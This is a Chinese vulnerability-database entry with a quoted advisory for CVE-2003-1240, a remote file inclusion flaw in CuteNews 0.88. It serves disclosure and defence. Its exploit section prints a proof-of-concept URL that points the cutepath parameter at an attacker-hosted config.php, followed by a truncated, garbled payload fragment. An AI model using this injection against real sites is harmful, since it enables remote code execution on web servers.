CuteNews远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107223 漏洞类型 代码注入
发布时间 2003-02-25 更新时间 2006-03-28
CVE编号 CVE-2003-1240 CNNVD-ID CNNVD-200312-373
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/22285
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-373
|漏洞详情
CuteNews0.88版本存在漏洞。远程攻击者可以通过修改(1)shownews.php、(2)search.php或(3)comments.php中的cutepath参数以引用含config.php或news.txt的远程web服务器上的URL来执行任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/6935/info
  
CuteNews is prone to an issue that may allow remote attackers to include files located on remote servers.
  
Under some circumstances, it is possible for remote attackers to influence the include path for several include files to point to an external file on a remote server.
  
If the remote file is a malicious file, this may be exploited to execute arbitrary system commands in the context of the web server.

http://www.example.com/cutenews/comments.php?cutepath=http://<attacker_site>/config.php

----------------------------------config.php----------------------------------------
  
/", $item); if ($match[1]) { if (preg_match("/\//", $match[1])) { echo $match[1]; echo "
"; } } } ?>
|参考资料

来源:BID
名称:6935
链接:http://www.securityfocus.com/bid/6935
来源:XF
名称:cutenews-php-file-include(11417)
链接:http://www.iss.net/security_center/static/11417.php
来源:BUGTRAQ
名称:20030225PHPcodeinjectioninCuteNews
链接:http://archives.neohapsis.com/archives/bugtraq/2003-02/0320.html